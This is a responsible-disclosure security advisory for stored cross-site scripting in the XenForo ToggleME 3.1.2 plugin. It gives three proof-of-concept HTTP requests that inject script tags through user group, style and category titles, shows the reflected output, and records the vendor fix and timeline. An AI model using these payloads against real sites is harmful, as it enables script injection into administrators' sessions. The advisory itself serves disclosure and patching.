XenForo ToggleME 3.1.2 "/admin.php?options/list/Add mortoggleME" Multiple Persistent Cross-Site Scriptings
Sep 11, 2016 · By Julien Ahrens
ADVISORY INFORMATION
- Product: XenForo ToggleME plugin
- Vendor URL: https://xenforo.com/community/resources/toggleme.137/
- CWE: Cross-Site Scripting [CWE-79]
- Date found: 2016-09-06
- Date published: 2016-09-11
- CVSS Score: 5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)
- CVE: -
CREDITS
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.
VERSIONS AFFECTED
ToggleME 3.1.2 older versions may be affected too.
INTRODUCTION
This addon will allow your users to collapse/expand some parts of your website: -forum categories -widgets -sidebar -sub-forums -postbit () -polls ()
(from the vendor’s homepage)
VULNERABILITY DETAILS
The script “/admin.php?options/list/toggleME” is vulnerable to multiple authenticated persistent Cross-Site Scripting vulnerabilities when user- supplied input is processed by the web application.
Since the application does not properly validate and sanitize the user group title, the style title and the category title values, which can be configured in the XenForo backend, it is possible to place arbitrary script code permanently on the administrative interface of the plugin “Home > Options > ToggleME” ("/admin.php?options/list/toggleME").
User Group Title PoC
The following Proof-of-Concept triggers this vulnerability by changing
the title of the existing user group “test” to
"><script>alert('usergroups-XSS')</script>:
POST /admin.php?user-groups/test.9/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin.php?user-groups/test.9/edit
Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098;
xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
title="><script>alert('usergroups-XSS')</script>&_xfToken=34486%2C1473325543%2Cd4c5dcb2ad2f2d5c42057fde1e5c0c3720f20179
The payload is then reflected multiple times on the “Home > Options > ToggleME” page, e.g.:
<li><label for="ctrl_optionstoggleME_Usergroups_Forumhome_9"><input
type="checkbox" name="options[toggleME_Usergroups_Forumhome][]"
value="9" id="ctrl_optionstoggleME_Usergroups_Forumhome_9"
checked="checked" /> "><script>alert('usergroups-XSS')</script></label></li>
Style Title PoC
The following Proof-of-Concept triggers this vulnerability by adding a
new style with the title "><script>alert('styles-XSS')</script>:
POST /admin.php?styles/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Ajax-Referer: http://localhost/admin.php?styles/add
x-requested-with: XMLHttpRequest
Referer: http://localhost/admin.php?styles/add
Content-Length: 330
Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098;
xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5
Connection: close
parent_id=0&title=Test%3Cscript%3Ealert('styles-XSS')%3C%2Fscript%3E&description=&user_selectable=1&style_id=&_xfToken=34486%2C1473326249%2C9a56292449c786527b4faf2be04e1d50786120a2&_xfRequestUri=%2Fadmin.php%3Fstyles%2Fadd&_xfNoRedirect=1&_xfToken=34486%2C1473326249%2C9a56292449c786527b4faf2be04e1d50786120a2&_xfResponseType=json
The payload is then reflected on the “Home > Options > ToggleME” page:
<li><label for="ctrl_optionstoggleME_styles_18"><input type="checkbox"
name="options[toggleME_styles][]" value="18"
id="ctrl_optionstoggleME_styles_18" />
Test<script>alert('styles-XSS')</script></label></li>
Category Title PoC
The following Proof-of-Concept triggers this vulnerability by adding a
new category node with the title "><script>alert('category-XSS')</script>:
POST /admin.php?categories/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Ajax-Referer: http://localhost/admin.php?nodes/insert
x-requested-with: XMLHttpRequest
Referer: http://localhost/admin.php?nodes/insert
Content-Length: 367
Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098;
xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5
Connection: close
title=Test%3Cscript%3Ealert('category-XSS')%3C%2Fscript%3E&description=&parent_node_id=0&display_order=1&display_in_list=1&node_type_id=Category&_xfToken=34486%2C1473326559%2C064f98b492af07e40d91b3e87c4b83838f260ad0&_xfRequestUri=%2Fadmin.php%3Fnodes%2Finsert&_xfNoRedirect=1&_xfToken=34486%2C1473326559%2C064f98b492af07e40d91b3e87c4b83838f260ad0&_xfResponseType=json
The payload is then reflected multiple times on the “Home > Options > ToggleME” page like
<li><label for="ctrl_optionstoggleME_DefaultOff_XenCat_70"><input
type="checkbox" name="options[toggleME_DefaultOff_XenCat][]" value="70"
id="ctrl_optionstoggleME_DefaultOff_XenCat_70" />
Test<script>alert('category-XSS')</script></label></li>
RISK
To successfully exploit these vulnerabilities, a user with rights to add or change user group titles, style titles or category titles must trick another authenticated user with access rights to the administrative panel of the plugin to visit the affected configuration page of the plugin.
The vulnerabilities allow remote attackers to permanently embed arbitrary script code into the administrative context of the plugin configuration page within the XenForo administrative backend interface, which offers a wide range of possible attacks such as redirecting the user for phishing purporses or attacking the browser and its components of a user visiting the page.
SOLUTION
Update to ToggleME 3.1.4
REPORT TIMELINE
- 2016-09-06: Discovery of the vulnerability
- 2016-09-07: Notified vendor via xenforo.com/community
- 2016-09-07: Vendor response to notification
- 2016-09-08: Full details sent to vendor
- 2016-09-08: Vendor releases ToggleMe 3.1.4 which fixes the issues
- 2016-09-11: Advisory released